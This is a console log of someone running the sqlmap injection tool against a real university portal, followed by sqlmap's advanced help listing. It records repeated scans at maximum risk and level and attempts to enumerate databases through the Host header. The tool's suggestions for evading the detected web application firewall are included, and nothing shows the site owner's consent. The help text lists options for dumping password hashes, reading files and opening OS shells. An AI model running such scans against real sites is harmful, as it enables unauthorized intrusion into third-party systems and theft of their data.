[15:24:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[15:24:46] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[15:24:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[15:24:47] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[15:24:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:24:47] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[15:24:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[15:24:47] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[15:24:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:24:48] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:24:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[15:24:48] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[15:24:48] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[15:24:48] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[15:24:49] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[15:24:49] [INFO] testing 'MonetDB OR error-based - WHERE or HAVING clause'
[15:24:49] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[15:24:49] [INFO] testing 'Vertica OR error-based - WHERE or HAVING clause'
[15:24:49] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[15:24:49] [INFO] testing 'IBM DB2 OR error-based - WHERE or HAVING clause'
[15:24:50] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:24:50] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:24:50] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:24:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:24:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:24:50] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:24:50] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:24:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:24:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:24:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:24:50] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:24:50] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[15:24:50] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[15:24:50] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[15:24:50] [INFO] testing 'Oracle error-based - Parameter replace'
[15:24:50] [INFO] testing 'Firebird error-based - Parameter replace'
[15:24:50] [INFO] testing 'IBM DB2 error-based - Parameter replace'
[15:24:50] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[15:24:50] [INFO] testing 'Generic inline queries'
[15:24:51] [INFO] testing 'MySQL inline queries'
[15:24:51] [INFO] testing 'PostgreSQL inline queries'
[15:24:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:24:51] [INFO] testing 'Oracle inline queries'
[15:24:51] [INFO] testing 'SQLite inline queries'
[15:24:51] [INFO] testing 'Firebird inline queries'
[15:24:52] [INFO] testing 'ClickHouse inline queries'
[15:24:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:24:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:24:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:24:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:24:52] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]
[15:24:53] [ERROR] user quit
[*] ending @ 15:24:53 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606 --risk 3 --level 5
___
__H__
___ ___[,]_____ ___ ___ {1.7.3#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:24:55 /2023-03-23/
[15:24:57] [INFO] testing connection to the target URL
[15:24:57] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[15:24:57] [INFO] testing if the target URL content is stable
[15:24:57] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:25:00] [INFO] testing if GET parameter 'thetime' is dynamic
[15:25:00] [INFO] GET parameter 'thetime' appears to be dynamic
[15:25:00] [INFO] heuristic (basic) test shows that GET parameter 'thetime' might be injectable
[15:25:01] [INFO] testing for SQL injection on GET parameter 'thetime'
[15:25:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:05] [INFO] GET parameter 'thetime' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:25:05] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'ClickHouse'
it looks like the back-end DBMS is 'ClickHouse'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[15:25:09] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:25:09] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:25:09] [INFO] testing 'Generic inline queries'
[15:25:09] [INFO] testing 'ClickHouse inline queries'
[15:25:09] [INFO] testing 'ClickHouse AND time-based blind (heavy query)'
[15:25:09] [INFO] testing 'ClickHouse OR time-based blind (heavy query)'
[15:25:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:25:09] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:25:09] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:25:09] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:25:09] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:25:09] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:25:09] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:25:09] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:25:09] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:25:09] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:25:09] [INFO] checking if the injection point on GET parameter 'thetime' is a false positive
[15:25:10] [WARNING] false positive or unexploitable injection point detected
[15:25:10] [WARNING] GET parameter 'thetime' does not seem to be injectable
[15:25:10] [INFO] testing if parameter 'User-Agent' is dynamic
[15:25:10] [INFO] parameter 'User-Agent' appears to be dynamic
[15:25:10] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[15:25:10] [INFO] testing for SQL injection on parameter 'User-Agent'
[15:25:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:12] [INFO] parameter 'User-Agent' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:25:12] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:25:12] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:25:12] [INFO] testing 'Generic inline queries'
[15:25:12] [INFO] testing 'ClickHouse inline queries'
[15:25:12] [INFO] testing 'ClickHouse AND time-based blind (heavy query)'
[15:25:12] [INFO] testing 'ClickHouse OR time-based blind (heavy query)'
[15:25:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:25:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:25:16] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:25:20] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:25:22] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:25:25] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:25:50] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:25:53] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:25:58] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:26:03] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:26:11] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:26:16] [INFO] checking if the injection point on User-Agent parameter 'User-Agent' is a false positive
[15:26:16] [WARNING] false positive or unexploitable injection point detected
[15:26:16] [WARNING] parameter 'User-Agent' does not seem to be injectable
[15:26:16] [INFO] testing if parameter 'Referer' is dynamic
[15:26:16] [WARNING] parameter 'Referer' does not appear to be dynamic
[15:26:16] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[15:26:17] [INFO] testing for SQL injection on parameter 'Referer'
[15:26:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:26:17] [INFO] parameter 'Referer' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:26:17] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:26:17] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:26:17] [INFO] testing 'Generic inline queries'
[15:26:18] [INFO] testing 'ClickHouse inline queries'
[15:26:18] [INFO] testing 'ClickHouse AND time-based blind (heavy query)'
[15:26:18] [INFO] testing 'ClickHouse OR time-based blind (heavy query)'
[15:26:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:26:21] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:26:26] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:26:31] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:26:36] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:26:39] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:26:44] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:26:47] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:26:51] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:26:54] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:26:58] [INFO] checking if the injection point on Referer parameter 'Referer' is a false positive
[15:26:58] [WARNING] false positive or unexploitable injection point detected
[15:26:58] [WARNING] parameter 'Referer' does not seem to be injectable
[15:26:58] [INFO] testing if parameter 'Host' is dynamic
[15:26:58] [WARNING] parameter 'Host' does not appear to be dynamic
[15:26:58] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[15:26:58] [INFO] testing for SQL injection on parameter 'Host'
[15:26:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:27:02] [INFO] parameter 'Host' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:27:02] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:27:02] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:27:02] [INFO] testing 'Generic inline queries'
[15:27:02] [INFO] testing 'ClickHouse inline queries'
[15:27:03] [INFO] testing 'ClickHouse AND time-based blind (heavy query)'
[15:27:05] [INFO] parameter 'Host' appears to be 'ClickHouse AND time-based blind (heavy query)' injectable
[15:27:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:27:08] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:27:12] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:27:17] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:27:20] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]
[15:27:20] [ERROR] user quit
[*] ending @ 15:27:20 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606 -p Host --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.7.3#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:28:13 /2023-03-23/
[15:28:13] [INFO] testing connection to the target URL
[15:28:13] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[15:28:13] [INFO] testing if the target URL content is stable
[15:28:14] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:28:17] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[15:28:17] [INFO] testing for SQL injection on parameter 'Host'
[15:28:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:28:19] [INFO] parameter 'Host' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:28:19] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'ClickHouse'
it looks like the back-end DBMS is 'ClickHouse'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'ClickHouse' extending provided level (1) and risk (1) values? [Y/n] Y
[15:28:41] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:28:41] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:28:41] [INFO] testing 'Generic inline queries'
[15:28:41] [INFO] testing 'ClickHouse inline queries'
[15:28:41] [INFO] testing 'ClickHouse AND time-based blind (heavy query)'
[15:28:41] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[15:28:43] [INFO] testing 'ClickHouse OR time-based blind (heavy query)'
[15:28:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:28:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:28:47] [INFO] checking if the injection point on Host parameter 'Host' is a false positive
[15:28:47] [WARNING] false positive or unexploitable injection point detected
[15:28:47] [WARNING] parameter 'Host' does not seem to be injectable
[15:28:47] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 15:28:47 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606 -p Host --dbs
___
__H__
___ ___[']_____ ___ ___ {1.7.3#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:28:53 /2023-03-23/
[15:28:53] [INFO] testing connection to the target URL
[15:28:54] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[15:28:54] [INFO] testing if the target URL content is stable
[15:28:54] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[15:28:56] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[15:28:56] [INFO] testing for SQL injection on parameter 'Host'
[15:28:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:28:57] [INFO] parameter 'Host' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:28:57] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'ClickHouse'
it looks like the back-end DBMS is 'ClickHouse'. Do you want to skip test payloads specific for other DBMSes? [Y/n] N
for the remaining tests, do you want to include all tests for 'ClickHouse' extending provided level (1) and risk (1) values? [Y/n] N
[15:29:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:29:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:29:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:29:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:29:02] [INFO] testing 'Generic inline queries'
[15:29:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:29:02] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[15:29:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:29:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:29:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:29:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:29:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:29:08] [INFO] testing 'Oracle AND time-based blind'
[15:29:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:29:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:29:13] [INFO] checking if the injection point on Host parameter 'Host' is a false positive
[15:29:13] [WARNING] false positive or unexploitable injection point detected
[15:29:13] [WARNING] parameter 'Host' does not seem to be injectable
[15:29:13] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 15:29:13 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -hh
___
__H__
___ ___[)]_____ ___ ___ {1.7.3#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: sqlmap.py [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-d DIRECT Connection string for direct database connection
-l LOGFILE Parse target(s) from Burp or WebScarab proxy log file
-m BULKFILE Scan multiple targets given in a textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target URLs
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target URL
-A AGENT, --user.. HTTP User-Agent header value
-H HEADER, --hea.. Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--method=METHOD Force usage of given HTTP method (e.g. PUT)
--data=DATA Data string to be sent through POST (e.g. "id=1")
--param-del=PARA.. Character used for splitting parameter values (e.g. &)
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--cookie-del=COO.. Character used for splitting cookie values (e.g. ;)
--live-cookies=L.. Live cookies file used for loading up-to-date values
--load-cookies=L.. File containing cookies in Netscape/wget format
--drop-set-cookie Ignore Set-Cookie header from response
--mobile Imitate smartphone through HTTP User-Agent header
--random-agent Use randomly selected HTTP User-Agent header value
--host=HOST HTTP Host header value
--referer=REFERER HTTP Referer header value
--headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--auth-type=AUTH.. HTTP authentication type (Basic, Digest, Bearer, ...)
--auth-cred=AUTH.. HTTP authentication credentials (name:password)
--auth-file=AUTH.. HTTP authentication PEM cert/private key file
--abort-code=ABO.. Abort on (problematic) HTTP error code(s) (e.g. 401)
--ignore-code=IG.. Ignore (problematic) HTTP error code(s) (e.g. 401)
--ignore-proxy Ignore system default proxy settings
--ignore-redirects Ignore redirection attempts
--ignore-timeouts Ignore connection timeouts
--proxy=PROXY Use a proxy to connect to the target URL
--proxy-cred=PRO.. Proxy authentication credentials (name:password)
--proxy-file=PRO.. Load proxy list from a file
--proxy-freq=PRO.. Requests between change of proxy from a given list
--tor Use Tor anonymity network
--tor-port=TORPORT Set Tor proxy port other than default
--tor-type=TORTYPE Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
--check-tor Check to see if Tor is used properly
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
--retries=RETRIES Retries when the connection timeouts (default 3)
--retry-on=RETRYON Retry request on regexp matching content (e.g. "drop")
--randomize=RPARAM Randomly change value for given parameter(s)
--safe-url=SAFEURL URL address to visit frequently during testing
--safe-post=SAFE.. POST data to send to a safe URL
--safe-req=SAFER.. Load safe HTTP request from a file
--safe-freq=SAFE.. Regular requests between visits to a safe URL
--skip-urlencode Skip URL encoding of payload data
--csrf-token=CSR.. Parameter used to hold anti-CSRF token
--csrf-url=CSRFURL URL address to visit for extraction of anti-CSRF token
--csrf-method=CS.. HTTP method to use during anti-CSRF token page visit
--csrf-data=CSRF.. POST data to send during anti-CSRF token page visit
--csrf-retries=C.. Retries for anti-CSRF token retrieval (default 0)
--force-ssl Force usage of SSL/HTTPS
--chunked Use HTTP chunked transfer encoded (POST) requests
--hpp Use HTTP parameter pollution method
--eval=EVALCODE Evaluate provided Python code before the request (e.g.
"import hashlib;id2=hashlib.md5(id).hexdigest()")
Optimization:
These options can be used to optimize the performance of sqlmap
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP response body
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--skip=SKIP Skip testing for given parameter(s)
--skip-static Skip testing parameters that not appear to be dynamic
--param-exclude=.. Regexp to exclude parameters from testing (e.g. "ses")
--param-filter=P.. Select testable parameter(s) by place (e.g. "POST")
--dbms=DBMS Force back-end DBMS to provided value
--dbms-cred=DBMS.. DBMS authentication credentials (user:password)
--os=OS Force back-end DBMS operating system to provided value
--invalid-bignum Use big numbers for invalidating values
--invalid-logical Use logical operations for invalidating values
--invalid-string Use random strings for invalidating values
--no-cast Turn off payload casting mechanism
--no-escape Turn off string escaping mechanism
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--string=STRING String to match when query is evaluated to True
--not-string=NOT.. String to match when query is evaluated to False
--regexp=REGEXP Regexp to match when query is evaluated to True
--code=CODE HTTP code to match when query is evaluated to True
--smart Perform thorough tests only if positive heuristic(s)
--text-only Compare pages based only on the textual content
--titles Compare pages based only on their titles
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS Range of columns to test for UNION query SQL injection
--union-char=UCHAR Character to use for bruteforcing number of columns
--union-from=UFROM Table to use in FROM part of UNION query SQL injection
--dns-domain=DNS.. Domain name used for DNS exfiltration attack
--second-url=SEC.. Resulting page URL searched for second-order response
--second-req=SEC.. Load second-order HTTP request from file
Fingerprint:
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
--comments Check for DBMS comments during enumeration
--statements Retrieve SQL statements being run on DBMS
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
-X EXCLUDE DBMS database identifier(s) to not enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--pivot-column=P.. Pivot column name
--where=DUMPWHERE Use WHERE condition while table dumping
--start=LIMITSTART First dump table entry to retrieve
--stop=LIMITSTOP Last dump table entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=SQLQ.. SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
--sql-file=SQLFILE Execute SQL statements from given file(s)
Brute force:
These options can be used to run brute force checks
--common-tables Check existence of common tables
--common-columns Check existence of common columns
--common-files Check existence of common files
User-defined function injection:
These options can be used to create custom user-defined functions
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
File system access:
These options can be used to access the back-end database management
system underlying file system
--file-read=FILE.. Read a file from the back-end DBMS file system
--file-write=FIL.. Write a local file on the back-end DBMS file system
--file-dest=FILE.. Back-end DBMS absolute filepath to write to
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:
These options can be used to access the back-end database management
system Windows registry
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
General:
These options can be used to set some general working parameters
-s SESSIONFILE Load session from a stored (.sqlite) file
-t TRAFFICFILE Log all HTTP traffic into a textual file
--abort-on-empty Abort data retrieval on empty results
--answers=ANSWERS Set predefined answers (e.g. "quit=N,follow=N")
--base64=BASE64P.. Parameter(s) containing Base64 encoded data
--base64-safe Use URL and filename safe Base64 alphabet (RFC 4648)
--batch Never ask for user input, use the default behavior
--binary-fields=.. Result fields having binary values (e.g. "digest")
--check-internet Check Internet connection before assessing the target
--cleanup Clean up the DBMS from sqlmap specific UDF and tables
--crawl=CRAWLDEPTH Crawl the website starting from the target URL
--crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout")
--csv-del=CSVDEL Delimiting character used in CSV output (default ",")
--charset=CHARSET Blind SQL injection charset (e.g. "0123456789abcdef")
--dump-file=DUMP.. Store dumped data to a custom file
--dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE)
--encoding=ENCOD.. Character encoding used for data retrieval (e.g. GBK)
--eta Display for each output the estimated time of arrival
--flush-session Flush session files for current target
--forms Parse and test forms on target URL
--fresh-queries Ignore query results stored in session file
--gpage=GOOGLEPAGE Use Google dork results from specified page number
--har=HARFILE Log all HTTP traffic into a HAR file
--hex Use hex conversion during data retrieval
--output-dir=OUT.. Custom output directory path
--parse-errors Parse and display DBMS error messages from responses
--preprocess=PRE.. Use given script(s) for preprocessing (request)
--postprocess=PO.. Use given script(s) for postprocessing (response)
--repair Redump entries having unknown character marker (?)
--save=SAVECONFIG Save options to a configuration INI file
--scope=SCOPE Regexp for filtering targets
--skip-heuristics Skip heuristic detection of vulnerabilities
--skip-waf Skip heuristic detection of WAF/IPS protection
--table-prefix=T.. Prefix used for temporary tables (default: "sqlmap")
--test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW)
--test-skip=TEST.. Skip tests by payloads and/or titles (e.g. BENCHMARK)
--web-root=WEBROOT Web server document root directory (e.g. "/var/www")
Miscellaneous:
These options do not fit into any other category
